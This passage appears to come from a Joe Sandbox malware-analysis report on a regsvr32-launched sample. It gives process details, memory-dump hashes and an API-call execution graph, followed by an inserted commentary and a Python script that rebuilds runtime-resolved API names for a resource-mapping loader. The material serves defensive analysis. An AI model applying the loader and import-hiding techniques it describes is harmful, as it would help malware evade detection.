Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:0x7ff73c930000
File size:51288 bytes
MD5 hash:32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                  Start time:09:47:38
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                  Imagebase:0x7ff7b0320000
                                                                                                                                                                                  File size:455656 bytes
                                                                                                                                                                                  MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:09:47:38
                                                                                                                                                                                  Start date:26/04/2022
                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                                                                                                  File size:625664 bytes
                                                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language

Memory Dump Source
• Source File: 00000000.00000002.317487733.00007FFC01110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffc01110000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a2bb9737b5ca2053246cec4b881ee9b273494af21e8e4b600883c569b0debcc
• Instruction ID: 7ba899348569464b8a827700ca9c54ec1a8f1885b38fc66cdf113b3530a12680
• Opcode Fuzzy Hash: 1a2bb9737b5ca2053246cec4b881ee9b273494af21e8e4b600883c569b0debcc
• Instruction Fuzzy Hash: 7601677115CB0C8FDB48EF0CE451AA6B7E0FB99324F10056DE58AC3655DA36E882CB45
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.317487733.00007FFC01110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ffc01110000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09367764bd74c479407c63c22c1b48e4deaf6135334c9c2702e8eaa43eb078e4
• Instruction ID: d542d16952c052cd9cdbdacb0ea36fb4ab6e45e96f75c9a57665185691bb6ecd
• Opcode Fuzzy Hash: 09367764bd74c479407c63c22c1b48e4deaf6135334c9c2702e8eaa43eb078e4
• Instruction Fuzzy Hash: 9AB17877E0D6A68FE706D63CA8B50D5BBA0FF96A3470900F7D0C4CE063EA15248BC665
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.305103508.00007FFC01110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC01110000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ffc01110000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
• Instruction ID: e14747400b03de292d48d70936eac92390de7ef3616bb9bd932641bb88e076a4
• Opcode Fuzzy Hash: d0b51852a536b454e05ac1f754ac60b49105048c3f4f6cfe66bc83972c063645
• Instruction Fuzzy Hash: 6101677115CB0C8FDB48EF0CE451AA6B7E0FB99324F10056DE58AC3651DA36E882CB45
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 9.2%
Dynamic/Decrypted Code Coverage: 7.1%
Signature Coverage: 2.3%
Total number of Nodes: 918
Total number of Limit Nodes: 15
18002a3b4 20432->20433 20434 180020300 free 45 API calls 20433->20434 20435 18002a3c0 20434->20435 20436 180020300 free 45 API calls 20435->20436 20437 18002a3cc 20436->20437 20438 180020300 free 45 API calls 20437->20438 20439 18002a3d8 20438->20439 20440 180020300 free 45 API calls 20439->20440 20441 18002a3e4 20440->20441 20442 180020300 free 45 API calls 20441->20442 20443 18002a3f0 20442->20443 20444 180020300 free 45 API calls 20443->20444 20445 18002a3fc 20444->20445 20446 180020300 free 45 API calls 20445->20446 20447 18002a408 20446->20447 20448 180020300 free 45 API calls 20447->20448 20449 18002a414 20448->20449 20450 180020300 free 45 API calls 20449->20450 20451 18002a420 20450->20451 20452 180020300 free 45 API calls 20451->20452 20453 18002a42c 20452->20453 20454 180020300 free 45 API calls 20453->20454 20455 18002a438 20454->20455 20456 180020300 free 45 API calls 20455->20456 20457 18002a444 20456->20457 20458 180020300 free 45 API calls 20457->20458 20459 18002a450 20458->20459 20460 180020300 free 45 API calls 20459->20460 20461 18002a45c 20460->20461 20462 180020300 free 45 API calls 20461->20462 20463 18002a468 20462->20463 20464 180020300 free 45 API calls 20463->20464 20465 18002a474 20464->20465 20466 180020300 free 45 API calls 20465->20466 20467 18002a480 20466->20467 20468 180020300 free 45 API calls 20467->20468 20469 18002a48c 20468->20469 20470 180020300 free 45 API calls 20469->20470 20471 18002a498 20470->20471 20472 180020300 free 45 API calls 20471->20472 20473 18002a4a4 20472->20473 20474 180020300 free 45 API calls 20473->20474 20475 18002a4b0 20474->20475 20476 180020300 free 45 API calls 20475->20476 20477 18002a4bc 20476->20477 20478 180020300 free 45 API calls 20477->20478 20479 18002a4c8 20478->20479 20480 180020300 free 45 API calls 20479->20480 20481 18002a4d4 20480->20481 20482 180020300 free 45 API calls 20481->20482 20483 18002a4e0 20482->20483 20484 180020300 free 45 API calls 20483->20484 20485 18002a4ec 20484->20485 
20486 180020300 free 45 API calls 20485->20486 20486->20400 20488 18002625a shared_ptr 20487->20488 20489 180026346 20487->20489 20508 18002a288 20488->20508 20492 18001fbe0 _RunAllParam 8 API calls 20489->20492 20494 1800263e6 20492->20494 20494->20301 20496 180029f84 __initmbctable 78 API calls 20496->20489 20498 18001fbe9 20497->20498 20499 18001fbf4 20498->20499 20500 180024ad4 RtlCaptureContext RtlLookupFunctionEntry 20498->20500 20499->20305 20501 180024b18 RtlVirtualUnwind 20500->20501 20502 180024b59 20500->20502 20503 180024b7b IsDebuggerPresent 20501->20503 20502->20503 20624 18002843c 20503->20624 20505 180024bda SetUnhandledExceptionFilter UnhandledExceptionFilter 20506 180024c02 GetCurrentProcess TerminateProcess 20505->20506 20507 180024bf8 _RunAllParam 20505->20507 20506->20305 20507->20506 20509 1800206d8 __initmbctable 45 API calls 20508->20509 20510 18002a2ac 20509->20510 20518 18002a01c 20510->20518 20513 180029f84 20514 1800206d8 __initmbctable 45 API calls 20513->20514 20515 180029fa8 20514->20515 20577 180029a44 20515->20577 20519 18002a06c GetStringTypeW 20518->20519 20520 18002a0a9 20518->20520 20521 18002a086 20519->20521 20522 18002a08e GetLastError 20519->20522 20520->20521 20523 18002a1d8 20520->20523 20524 18002a0d2 MultiByteToWideChar 20521->20524 20539 18002a1d1 20521->20539 20522->20520 20542 18002b35c GetLocaleInfoA 20523->20542 20530 18002a100 20524->20530 20524->20539 20526 18001fbe0 _RunAllParam 8 API calls 20528 1800262dd 20526->20528 20528->20513 20529 18002a233 GetStringTypeA 20531 18002a256 20529->20531 20529->20539 20532 180020248 malloc 45 API calls 20530->20532 20534 18002a125 shared_ptr _flush 20530->20534 20535 180020300 free 45 API calls 20531->20535 20532->20534 20536 18002a18c MultiByteToWideChar 20534->20536 20534->20539 20535->20539 20538 18002a1ae GetStringTypeW 20536->20538 20540 18002a1c3 20536->20540 20538->20540 20539->20526 20540->20539 20541 180020300 free 45 API calls 20540->20541 20541->20539 20543 
18002b393 20542->20543 20544 18002b38e 20542->20544 20573 180021548 20543->20573 20546 18001fbe0 _RunAllParam 8 API calls 20544->20546 20547 18002a202 20546->20547 20547->20529 20547->20539 20548 18002b3b0 20547->20548 20549 18002b402 GetCPInfo 20548->20549 20550 18002b4da 20548->20550 20551 18002b4b3 MultiByteToWideChar 20549->20551 20552 18002b414 20549->20552 20553 18001fbe0 _RunAllParam 8 API calls 20550->20553 20551->20550 20557 18002b439 malloc 20551->20557 20552->20551 20554 18002b41e GetCPInfo 20552->20554 20555 18002a228 20553->20555 20554->20551 20556 18002b433 20554->20556 20555->20529 20555->20539 20556->20551 20556->20557 20558 180020248 malloc 45 API calls 20557->20558 20559 18002b475 shared_ptr _flush 20557->20559 20558->20559 20559->20550 20560 18002b511 MultiByteToWideChar 20559->20560 20561 18002b573 20560->20561 20562 18002b53b 20560->20562 20561->20550 20567 180020300 free 45 API calls 20561->20567 20563 18002b57b 20562->20563 20564 18002b540 WideCharToMultiByte 20562->20564 20565 18002b581 WideCharToMultiByte 20563->20565 20566 18002b5ad 20563->20566 20564->20561 20565->20561 20565->20566 20568 180024c8c _getptd 45 API calls 20566->20568 20567->20550 20569 18002b5ba 20568->20569 20569->20561 20570 18002b5c2 WideCharToMultiByte 20569->20570 20570->20561 20571 18002b5eb 20570->20571 20572 180020300 free 45 API calls 20571->20572 20572->20561 20574 180027564 20573->20574 20575 1800272e0 __initmbctable 67 API calls 20574->20575 20576 18002758f 20575->20576 20576->20544 20578 180029a9c LCMapStringW 20577->20578 20581 180029ac0 20577->20581 20579 180029acc GetLastError 20578->20579 20578->20581 20579->20581 20580 180029d8e 20585 18002b35c __initmbctable 67 API calls 20580->20585 20581->20580 20582 180029b3b 20581->20582 20583 180029d87 20582->20583 20584 180029b59 MultiByteToWideChar 20582->20584 20586 18001fbe0 _RunAllParam 8 API calls 20583->20586 20584->20583 20594 180029b88 20584->20594 20587 180029dbc 20585->20587 20588 180026310 20586->20588 
20587->20583 20590 180029f17 LCMapStringA 20587->20590 20591 180029ddb 20587->20591 20588->20496 20589 180029c04 MultiByteToWideChar 20592 180029d79 20589->20592 20593 180029c2e LCMapStringW 20589->20593 20606 180029e23 20590->20606 20595 18002b3b0 __initmbctable 60 API calls 20591->20595 20592->20583 20602 180020300 free 45 API calls 20592->20602 20593->20592 20596 180029c58 20593->20596 20597 180029bb9 _flush 20594->20597 20598 180020248 malloc 45 API calls 20594->20598 20599 180029df3 20595->20599 20603 180029c63 20596->20603 20609 180029c9e 20596->20609 20597->20583 20597->20589 20598->20597 20599->20583 20600 180029dfb LCMapStringA 20599->20600 20600->20606 20611 180029e2a 20600->20611 20601 180029f47 20601->20583 20607 180020300 free 45 API calls 20601->20607 20602->20583 20603->20592 20605 180029c7a LCMapStringW 20603->20605 20604 180020300 free 45 API calls 20604->20601 20605->20592 20606->20601 20606->20604 20607->20583 20608 180029d0b LCMapStringW 20612 180029d6b 20608->20612 20613 180029d2c WideCharToMultiByte 20608->20613 20610 180020248 malloc 45 API calls 20609->20610 20617 180029cbc _flush 20609->20617 20610->20617 20615 180029e4b shared_ptr _flush 20611->20615 20616 180020248 malloc 45 API calls 20611->20616 20612->20592 20621 180020300 free 45 API calls 20612->20621 20613->20612 20614 180029ead LCMapStringA 20618 180029ed5 20614->20618 20619 180029ed9 20614->20619 20615->20606 20615->20614 20616->20615 20617->20592 20617->20608 20618->20606 20623 180020300 free 45 API calls 20618->20623 20622 18002b3b0 __initmbctable 60 API calls 20619->20622 20621->20592 20622->20618 20623->20606 20624->20505 20626 180026ed2 20625->20626 20627 180026ebb 20625->20627 20629 180024c20 __setargv 44 API calls 20626->20629 20639 180026ee7 20626->20639 20628 180025c48 _FF_MSGBANNER 44 API calls 20627->20628 20630 180026ec0 20628->20630 20631 180026ef5 20629->20631 20632 180025a20 malloc 44 API calls 20630->20632 20633 180026f0c 20631->20633 20634 180026efd 20631->20634 
20635 180026ec8 20632->20635 20638 180026f7c _lock 44 API calls 20633->20638 20637 180020618 _errno 44 API calls 20634->20637 20636 180020f28 malloc 3 API calls 20635->20636 20636->20626 20637->20639 20640 180026f16 20638->20640 20639->20309 20639->20313 20641 180026f1f 20640->20641 20642 180026f4e 20640->20642 20644 1800272a8 _lock InitializeCriticalSectionAndSpinCount 20641->20644 20643 180020300 free 44 API calls 20642->20643 20645 180026f3d LeaveCriticalSection 20643->20645 20646 180026f2c 20644->20646 20645->20639 20646->20645 20648 180020300 free 44 API calls 20646->20648 20649 180026f38 20648->20649 20650 180020618 _errno 44 API calls 20649->20650 20650->20645 20652 1800215e4 20651->20652 20653 1800206d8 __initmbctable 45 API calls 20652->20653 20654 180021608 20653->20654 20654->20247 20656 180026fd6 EncodePointer 20655->20656 20656->20656 20657 180020ffb 20656->20657 20658 180020f8c 20657->20658 20659 180020fa3 20658->20659 20660 180020fba 20658->20660 20659->20660 20668 180028f74 20659->20668 20660->20048 20662 18001fd4c 20660->20662 20674 18001fc44 20662->20674 20664 18001fd55 20664->20048 20665 180030360 20664->20665 20690 180004540 20665->20690 20669 180028f89 20668->20669 20670 180024c8c _getptd 45 API calls 20669->20670 20671 180028fa8 20670->20671 20672 180024c8c _getptd 45 API calls 20671->20672 20673 180028fc5 20671->20673 20672->20673 20673->20659 20689 180020f40 20674->20689 20676 18001fc65 DecodePointer DecodePointer 20677 18001fc8d 20676->20677 20679 18001fd25 _cinit 20676->20679 20678 180021500 _cinit 46 API calls 20677->20678 20677->20679 20680 18001fca9 20678->20680 20679->20664 20681 18001fd05 EncodePointer EncodePointer 20680->20681 20682 18001fcd6 20680->20682 20683 18001fcc5 20680->20683 20681->20679 20682->20679 20685 18001fccd 20682->20685 20684 180024d10 _cinit 49 API calls 20683->20684 20684->20685 20685->20682 20686 18001fcee EncodePointer 20685->20686 20687 180024d10 _cinit 49 API calls 20685->20687 20686->20681 20688 18001fce9 
20687->20688 20688->20679 20688->20686 20693 180017e84 20690->20693 20692 180004550 20709 1800186c8 20693->20709 20696 180017ec6 20722 18001aa78 20696->20722 20700 180017eef 20736 18001b63c 20700->20736 20704 180017f14 20706 180017f1f GetCurrentThread GetCurrentThreadId 20704->20706 20707 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20704->20707 20705 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20705->20704 20706->20692 20708 180017f1e 20707->20708 20708->20706 20753 180013904 20709->20753 20713 180017eac 20713->20696 20714 180021388 20713->20714 20715 18002139f malloc 20714->20715 20720 1800213e0 20714->20720 20716 180020248 malloc 45 API calls 20715->20716 20717 1800213b0 20716->20717 20718 180021288 malloc 45 API calls 20717->20718 20717->20720 20719 1800213c7 20718->20719 20719->20720 20721 180021708 malloc 6 API calls 20719->20721 20720->20696 20721->20720 20723 18001b63c _RunAllParam 73 API calls 20722->20723 20724 18001aa8f 20723->20724 20725 18001aa99 20724->20725 20727 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20724->20727 20726 180017edb 20725->20726 20764 18001b158 20725->20764 20726->20700 20731 18000bcd8 20726->20731 20727->20725 20730 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20730->20726 20783 180020530 20731->20783 20733 18000bcf9 20786 18001b08c LocalAlloc 20733->20786 20735 18000bd13 Concurrency::details::ExternalContextBase::~ExternalContextBase 20735->20700 20737 18001b667 20736->20737 20738 18001b66c 20736->20738 20739 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20737->20739 20750 18001b6b5 20738->20750 20752 18001b6a1 20738->20752 20812 18001b20c TlsAlloc 20738->20812 20739->20738 20744 180017f03 20744->20704 20744->20705 20745 18001b6cc 20824 18001b48c EnterCriticalSection 20745->20824 20746 18001b68f 20749 18000bcd8 
Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20746->20749 20746->20752 20747 18001b6aa 20748 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20747->20748 20747->20750 20748->20750 20749->20752 20817 18001b0c4 EnterCriticalSection 20750->20817 20793 18001b25c EnterCriticalSection 20752->20793 20754 18001aa78 _RunAllParam 79 API calls 20753->20754 20755 180013912 20754->20755 20756 1800182c4 20755->20756 20759 18001a244 20756->20759 20760 18001b63c _RunAllParam 73 API calls 20759->20760 20761 18001a25b 20760->20761 20762 1800182e5 GetCursorPos 20761->20762 20763 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20761->20763 20762->20713 20763->20762 20765 18001aab6 20764->20765 20766 18001b17a 20764->20766 20765->20726 20765->20730 20770 18001bc74 20766->20770 20771 18001bc86 20770->20771 20776 18001bc8b 20770->20776 20772 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20771->20772 20772->20776 20773 18001bc9a 20774 18001bce8 EnterCriticalSection 20773->20774 20775 18001bcab EnterCriticalSection 20773->20775 20778 18001bcc2 InitializeCriticalSection 20775->20778 20779 18001bcdb LeaveCriticalSection 20775->20779 20776->20773 20780 18001bc44 20776->20780 20778->20779 20779->20774 20781 18001bc52 InitializeCriticalSection 20780->20781 20782 18001bc6f 20780->20782 20781->20782 20782->20773 20784 180020557 __initmbctable 20783->20784 20785 18002059e RaiseException 20784->20785 20785->20733 20787 18001b0a3 20786->20787 20788 18001b0a8 20786->20788 20790 18000bc90 20787->20790 20788->20735 20791 180020530 __SehTransFilter RaiseException 20790->20791 20792 18000bcb1 20791->20792 20794 18001b28e 20793->20794 20795 18001b3a2 shared_ptr 20794->20795 20797 18001b30a GlobalHandle GlobalUnlock 20794->20797 20798 18001b2df 20794->20798 20796 18001b3b5 LeaveCriticalSection 20795->20796 20796->20747 20799 18001b338 GlobalReAlloc 20797->20799 
20800 18001b32d 20797->20800 20801 18001b2fb GlobalAlloc 20798->20801 20847 18000101c 20798->20847 20803 18001b34a 20799->20803 20802 18000101c Concurrency::details::ExternalContextBase::~ExternalContextBase 49 API calls 20800->20802 20801->20803 20805 18001b337 20802->20805 20806 18001b377 GlobalLock 20803->20806 20808 18001b358 GlobalHandle GlobalLock 20803->20808 20809 18001b367 LeaveCriticalSection 20803->20809 20805->20799 20806->20795 20808->20809 20810 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20809->20810 20811 18001b376 20810->20811 20811->20806 20813 18001b241 20812->20813 20814 18001b247 InitializeCriticalSection 20812->20814 20815 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20813->20815 20814->20746 20816 18001b246 20815->20816 20816->20814 20818 18001b115 LeaveCriticalSection 20817->20818 20819 18001b0e7 20817->20819 20821 18001b121 20818->20821 20819->20818 20820 18001b0ec TlsGetValue 20819->20820 20820->20818 20822 18001b0f9 20820->20822 20821->20744 20821->20745 20822->20818 20823 18001b0fe LeaveCriticalSection 20822->20823 20823->20821 20825 18001b4c8 20824->20825 20826 18001b5f7 LeaveCriticalSection 20824->20826 20825->20826 20828 18001b4d1 TlsGetValue 20825->20828 20827 18001b601 20826->20827 20827->20744 20829 18001b4f5 20828->20829 20832 18001b4e1 20828->20832 20830 18001b08c Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20829->20830 20830->20832 20833 18001b5d9 LeaveCriticalSection 20832->20833 20834 18001b535 20832->20834 20835 18001b560 20832->20835 20833->20827 20837 18001b551 LocalAlloc 20834->20837 20840 18000101c Concurrency::details::ExternalContextBase::~ExternalContextBase 49 API calls 20834->20840 20836 18001b57c LocalReAlloc 20835->20836 20838 18000101c Concurrency::details::ExternalContextBase::~ExternalContextBase 49 API calls 20835->20838 20839 18001b591 20836->20839 20837->20839 20841 18001b57b 20838->20841 
20842 18001b5a5 shared_ptr 20839->20842 20843 18001b596 LeaveCriticalSection 20839->20843 20844 18001b550 20840->20844 20841->20836 20846 18001b5c6 TlsSetValue 20842->20846 20845 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20843->20845 20844->20837 20845->20842 20846->20833 20848 180001028 20847->20848 20849 18000102d 20847->20849 20850 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20848->20850 20853 18000b9dc 20849->20853 20850->20849 20870 18000b754 20853->20870 20855 18000b9fc Concurrency::details::ExternalContextBase::~ExternalContextBase 20856 180020530 __SehTransFilter RaiseException 20855->20856 20857 18000ba3c FormatMessageA 20856->20857 20859 180001033 20857->20859 20860 18000ba8d 20857->20860 20874 180020500 20860->20874 20862 18000bacb LocalFree 20862->20859 20863 18000bac4 20864 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20863->20864 20868 18000baca 20864->20868 20865 18000babe 20867 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20865->20867 20867->20863 20868->20862 20869 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20869->20865 20873 18000b763 20870->20873 20871 180020248 malloc 45 API calls 20871->20873 20872 18000b788 20872->20855 20873->20871 20873->20872 20875 180025e14 Concurrency::details::ExternalContextBase::~ExternalContextBase 45 API calls 20874->20875 20876 18000baa1 20875->20876 20876->20862 20876->20863 20876->20865 20876->20869 20878 1800283d3 malloc 20877->20878 20879 1800283a1 20877->20879 20882 1800283eb RtlAllocateHeap 20878->20882 20885 1800283cf 20878->20885 20879->20878 20880 1800283af 20879->20880 20881 180020618 _errno 44 API calls 20880->20881 20883 1800283b4 20881->20883 20882->20878 20882->20885 20884 180021830 _FF_MSGBANNER 7 API calls 20883->20884 20884->20885 20885->20051 20888 180023429 20887->20888 20916 
18002354a 20887->20916 20889 180023444 20888->20889 20890 180020300 free 45 API calls 20888->20890 20891 180023452 20889->20891 20892 180020300 free 45 API calls 20889->20892 20890->20889 20893 180023460 20891->20893 20894 180020300 free 45 API calls 20891->20894 20892->20891 20895 18002346e 20893->20895 20897 180020300 free 45 API calls 20893->20897 20894->20893 20896 18002347c 20895->20896 20898 180020300 free 45 API calls 20895->20898 20899 18002348a 20896->20899 20900 180020300 free 45 API calls 20896->20900 20897->20895 20898->20896 20901 18002349b 20899->20901 20902 180020300 free 45 API calls 20899->20902 20900->20899 20903 1800234b3 20901->20903 20904 180020300 free 45 API calls 20901->20904 20902->20901 20905 180026f7c _lock 45 API calls 20903->20905 20904->20903 20908 1800234bd 20905->20908 20906 1800234eb 20919 180026e7c LeaveCriticalSection 20906->20919 20908->20906 20910 180020300 free 45 API calls 20908->20910 20910->20906 20916->20079 20921 180004bc4 20920->20921 20922 180004bc8 RtlDeleteBoundaryDescriptor 20920->20922 20921->19941 20921->19946 20922->20921 20925 180004a3a 20924->20925 20925->19941 20926 11f0000 20927 11f0185 20926->20927 20928 11f03f2 VirtualAlloc 20927->20928 20931 11f0418 20928->20931 20929 11f04dc GetNativeSystemInfo 20930 11f0518 VirtualAlloc 20929->20930 20933 11f0a09 20929->20933 20932 11f0536 VirtualAlloc 20930->20932 20936 11f054b 20930->20936 20931->20929 20931->20933 20932->20936 20934 11f0998 20934->20933 20935 11f09e4 RtlAvlRemoveNode 20934->20935 20935->20933 20936->20934 20937 11f0971 VirtualProtect 20936->20937 20937->20936 20938 18000a5b0 20941 180004648 20938->20941 20940 18000a5c7 ExitProcess 20942 180004892 __SehTransFilter 20941->20942 20942->20940

Control-flow Graph (11f0000)

[Basic-block graph rendered from an image; the block/edge list is omitted. Blocks with API calls: 11f0000-11f0416 (two calls to 11f0a40, then VirtualAlloc), 11f04dc-11f0512 (GetNativeSystemInfo), 11f0518-11f0534 and 11f0536-11f0549 (VirtualAlloc), 11f0971-11f0981 (VirtualProtect), 11f09e4-11f0a07 (RtlAvlRemoveNode). Most early checks branch to a shared bail-out block at 11f0a23 that falls into the epilogue 11f0a25-11f0a3f; the main body is a set of loops over 11f0561-11f0992.]
Memory Dump Source
• Source File: 00000006.00000002.296532315.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11f0000_regsvr32.jbxd
Similarity
• API ID: Virtual$Alloc$InfoNativeNodeProtectRemoveSystem
• String ID: Cach$Find$Flus$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$p$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce
• API String ID: 808794760-1106743406
• Opcode ID: 96fce6a7bff5e5b76bf571e1cae8f3a184cbff359d7bfa11d59d9d5912008097
• Instruction ID: ade39874ce14386b62acb899197e17212ee324b709511047f1c5569f0c253fe1
• Opcode Fuzzy Hash: 96fce6a7bff5e5b76bf571e1cae8f3a184cbff359d7bfa11d59d9d5912008097
• Instruction Fuzzy Hash: ED72E431618B488FDB1DDF18C8856BAB7E2FB98305F14462DE98BC7212EB34D546CB85
Uniqueness
• Uniqueness Score: -1.00%
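The String ID list for the 11f0000 region is not a set of real strings but 4-byte fragments, which is what a string extractor sees when a function builds names on the stack one DWORD at a time (mov dword ptr [mem], imm32) instead of storing them as contiguous literals. Read in the right order the fragments spell LoadLibraryA, GetNativeSystemInfo, VirtualAlloc, VirtualProtect, FindResource, LoadResource, LockResource, SizeofResource, FlushInstructionCache, RtlAddFunctionTable and Sleep; together with the VirtualAlloc / GetNativeSystemInfo / VirtualProtect calls in this block, that is consistent with a loader that resolves its imports at runtime and maps a payload carried as a resource. The script below is an added example, not part of the Joe Sandbox report: it checks which API names can be tiled from the fragment multiset and reports any fragments left unexplained. The fragment list is copied from the report; the candidate names (including two decoys) are my assumption, and the tolerance for a missing short tail is there because most extractors drop strings below a minimum length.

```python
"""Reassemble 4-byte string fragments into Win32 API names.

Added example: the fragment list is constructed from the String ID line of the
Joe Sandbox report; the candidate names are an assumption, not report data.
"""
from collections import Counter

CHUNK = 4  # a mov dword ptr [mem], imm32 stores 4 bytes at a time

# Constructed from the report's "String ID" line, split on '$'.
FRAGMENTS = (
    "Cach$Find$Flus$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$RtlA$Size$Slee"
    "$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$p$rote$sour"
    "$temI$tion$truc$ualA$ualP$urce$urce$urce"
).split("$")

# Assumed candidates: APIs a runtime-resolving loader commonly needs, plus two
# decoys (CreateThread, VirtualFree) that must NOT be tileable from the pool.
CANDIDATES = [
    "LoadLibraryA", "GetNativeSystemInfo", "VirtualAlloc", "VirtualProtect",
    "FindResource", "LoadResource", "LockResource", "SizeofResource",
    "FlushInstructionCache", "RtlAddFunctionTable", "Sleep",
    "CreateThread", "VirtualFree",
]


def chunks(name: str) -> list[str]:
    """Split a name the way the compiler stored it: fixed-size pieces, last one ragged."""
    return [name[i:i + CHUNK] for i in range(0, len(name), CHUNK)]


def tile(name: str, pool: Counter) -> bool:
    """Return True and consume the chunks from `pool` if `name` can be built from them.

    A trailing chunk shorter than CHUNK may be absent: string extractors usually
    apply a minimum length, so a 1-3 byte tail often never appears in the list.
    Nothing is consumed unless every required chunk is present.
    """
    parts = chunks(name)
    need = Counter(parts)
    tail = parts[-1] if len(parts[-1]) < CHUNK else None
    for part, n in need.items():
        missing = n - pool[part]
        if missing > 0 and not (part == tail and missing == 1):
            return False
    for part, n in need.items():
        pool[part] -= min(n, pool[part])  # consume only what is actually there
    return True


def reassemble(fragments: list[str], candidates: list[str]) -> tuple[list[str], list[str]]:
    """Greedily match candidates (longest first) against the fragment multiset.

    Returns (matched names, leftover fragments). The leftovers are the useful
    part for an analyst: chunks no candidate explains point at names not yet
    guessed, so iterate until the list is empty.
    """
    pool = Counter(fragments)
    matched = [c for c in sorted(candidates, key=len, reverse=True) if tile(c, pool)]
    leftover = sorted(pool.elements())
    return sorted(matched), leftover


if __name__ == "__main__":
    found, rest = reassemble(FRAGMENTS, CANDIDATES)
    print("resolved:", ", ".join(found))
    print("unexplained fragments:", rest or "none")
```

For this sample every fragment is consumed by the eleven expected names and both decoys are rejected, so the 4-byte chunking hypothesis explains the whole list. On a different dump, anything left in the second list is where to look next, either for an API you have not guessed or for non-API stack strings such as DLL names.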
Control-flow Graph

Memory Dump Source
• Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocAllocateHeapVirtual
